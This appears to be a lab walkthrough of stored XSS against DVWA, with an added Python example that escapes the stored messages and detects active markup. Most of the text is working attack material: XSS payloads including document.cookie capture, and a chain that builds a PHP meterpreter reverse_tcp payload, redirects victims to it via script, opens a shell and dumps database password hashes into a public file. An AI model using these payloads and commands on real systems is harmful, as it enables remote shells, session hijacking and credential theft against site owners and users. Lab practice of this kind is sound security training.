
1. XSS Stored Basic Exploit Test

Name: Test 1
Message: <script>alert("This is a XSS Test")</script>

View Test 1 Results
Note: Every time a user comes to this forum, this XSS exploit will be displayed.
Note: This exploit can be easily modified to capture cookie/session information for future man-in-the-middle attacks.

Reset DB

2. XSS Stored IFRAME Exploit Test
Name: Test 2
Message: <iframe src="http://www.cnn.com"></iframe>

View Test 2 Results
Note: This is a powerful exploit because a user could use SET to create a malicious cloned website and place it here.

Reset DB

3. XSS Stored COOKIE Exploit Test
Name: Test 3
Message: <script>alert(document.cookie)</script>

View Cookie
Note: An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
Note: Having received the cookie remotely, the attacker can carry out a MITM attack: impersonating the victim, they connect to the site and can access that victim's information.

Reset DB
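
The three stored messages from Tests 1-3, rendered once the way the vulnerable guestbook does and once with output encoding. This is an added example, not part of the original post or DVWA's own code. The function names are hypothetical, Python's html.escape stands in for PHP's htmlspecialchars, and the parser check is one assumed way to regression-test the fix.

```python
import html
from html.parser import HTMLParser

# The three guestbook messages from Tests 1-3 on this page.
ENTRIES = [
    ("Test 1", '<script>alert("This is a XSS Test")</script>'),
    ("Test 2", '<iframe src="http://www.cnn.com"></iframe>'),
    ("Test 3", "<script>alert(document.cookie)</script>"),
]

def render_vulnerable(entries):
    """Stored values are concatenated into the page unchanged (the flaw)."""
    rows = [f"<div>Name: {n}<br>Message: {m}</div>" for n, m in entries]
    return "<html><body>" + "".join(rows) + "</body></html>"

def render_hardened(entries):
    """Every stored value is HTML-encoded at output time."""
    rows = [
        f"<div>Name: {html.escape(n)}<br>Message: {html.escape(m)}</div>"
        for n, m in entries
    ]
    return "<html><body>" + "".join(rows) + "</body></html>"

class ActiveContentFinder(HTMLParser):
    """Collects markup a plain-text guestbook page should never emit."""
    ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.findings.append(tag)
        # Inline event-handler attributes (on*) also run script.
        self.findings += [name for name, _ in attrs if name.startswith("on")]

def active_content(page):
    """Return the active tags/attributes found in rendered HTML."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    print("vulnerable:", active_content(render_vulnerable(ENTRIES)))
    print("hardened:  ", active_content(render_hardened(ENTRIES)))
```

Marking the session cookie HttpOnly additionally keeps document.cookie from exposing it in Test 3.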

7. XSS Stored window.location Exploit Test

1) Build PHP msfpayload from kali
mkdir -p /root/backdoor
cd /root/backdoor
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.122.148 LPORT=4444 R > FORUM_BUG.php
ls -l FORUM_BUG.php
vi FORUM_BUG.php <-------------- uncomment the <?php tag

2) Upload PHP Payload

3) Start PHP Payload Listener from kali
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.122.148
set LPORT 4444
exploit

4) XSS Stored window.location Exploit
: Enter JavaScript that loads the FORUM_BUG.php saved above
Name: Test 4
Message: <script>window.location="http://192.168.122.179/dvwa/hackable/uploads/FORUM_BUG.php" </script>

5) Access from victim

6) View Metasploit Session
from Meterpreter:
shell
tail /etc/passwd
whoami
grep apache /etc/passwd
find /var/www/* -print | grep config
grep "db_" /var/www/html/dvwa/config/config.inc.php
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- The <pre> is used as a pre-formatter
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- Now, accessing this page shows the information pulled from the DB above

DVWA - Stored XSS (Cross Site Scripting) | Hojung | 2014.10.04